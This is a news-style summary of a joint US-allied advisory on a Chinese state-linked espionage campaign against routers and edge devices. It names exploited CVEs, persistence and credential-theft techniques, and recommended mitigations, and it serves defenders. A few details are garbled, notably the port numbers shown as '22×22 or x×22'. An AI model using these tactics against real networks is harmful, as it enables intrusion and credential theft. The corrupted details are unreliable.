RED ALERT: China Conducts Global Espionage Campaign Exploiting Our Networks

Joint US-Allied Alert Reveals Espionage Campaign Undermining Critical Global Infrastructure

The Chinese government is conducting a global cyber espionage campaign, leveraging the vulnerabilities of networks worldwide to fuel a surveillance and intelligence system on an unprecedented scale. A joint advisory, issued by security agencies from the United States, United Kingdom, Canada, Australia, and other nations, thoroughly exposes a threat that is no longer theoretical but tangible and active across the globe. This operation is not about simple data theft; it's about establishing long-term intelligence infrastructure to support Beijing's geopolitical objectives.

The War for Critical Infrastructure

The threat actors, generically referred to as "Advanced Persistent Threat (APT) actors," have systematically targeted critical infrastructure networks globally, including telecommunications, government, transportation, lodging, and military systems. These actors are linked to China-based entities like Sichuan Juxinhe Network Technology and Beijing Huanyu Tianqiong Information Technology, which provide cyber-related services to China's intelligence services and the People's Liberation Army. The criminals focus on large backbone routers and provider edge devices to gain a foothold in networks and then pivot to others using trusted connections. The ultimate goal is to collect data that can be used to identify and track targets' communications and movements worldwide.

Tactics of Infiltration and Covert Persistence

The advisory describes a meticulous and aggressive strategy for infiltration and long-term control, designed to maximize impact while minimizing detection⁸⁸⁸⁸.

• Massive Exploitation of Known Vulnerabilities: The attackers are having "considerable success" exploiting publicly known vulnerabilities (CVEs) on exposed network edge devices. The advisory lists specific CVEs, including CVE-2024-21887 (Ivanti), CVE-2024-3400 (Palo Alto Networks), and the critical CVE-2023-20273 and CVE-2023-20198 (Cisco IOS XE).

  
  

• Abuse of Trusted Connections and Multi-Hop Infiltration: A key element of this campaign is the attackers' ability to exploit trusted relationships, such as provider-to-provider or provider-to-customer links, to pivot from one compromised network to another. They use intermediate routers as a launchpad to infiltrate multiple targets, making it difficult to trace the attack's origin.

  
  

• Covert Persistence and Credential Theft: Once inside, the attackers modify devices to maintain long-term access, opening non-standard ports (such as SSH on ports like 22×22 or x×22) and creating unauthorized administrative accounts. They also steal credentials by using the packet capture (PCAP) capabilities of routers to collect authentication traffic like TACACS+. This allows them to obtain weak or reversibly encrypted passwords (like Cisco Type 7) to compromise additional accounts and facilitate lateral movement. The attackers also abuse features like

  
  

  Cisco Guest Shell, a built-in Linux container, to execute tools and process data undetected.

The Required Response: An Aggressive Hunt

The advisory is a clear call to action. The participating agencies state that passive defense is no longer sufficient. They urge network defenders to conduct an "active hunt" and a simultaneous, aggressive eviction of the attackers. The document warns that partial response actions could alert the adversary, prompting them to take countermeasures to maintain their access. In the context of cyber warfare, the integrity of communication infrastructure is a fundamental battlefield, and organizations are advised to immediately implement the recommended mitigations to protect against this persistent and strategic threat.

Recommended mitigations include:

• Risk Assessment: Regularly review router logs and configurations for signs of unusual activity, such as changes to Access Control Lists (ACLs), unauthorized routes, or the activation of features like Guest Shell.

  
  

• System Hardening: Use only encrypted and authenticated management protocols like SSHv2 and HTTPS, and disable unencrypted protocols like Telnet and HTTP.

  
  

• Management Plane Isolation: Isolate management services on a dedicated network or a separate Virtual Routing and Forwarding (VRF) instance to prevent lateral movement.

  
  

• Active Monitoring: Continuously monitor traffic for unusual connections, especially for tunnels or file transfers originating from network devices.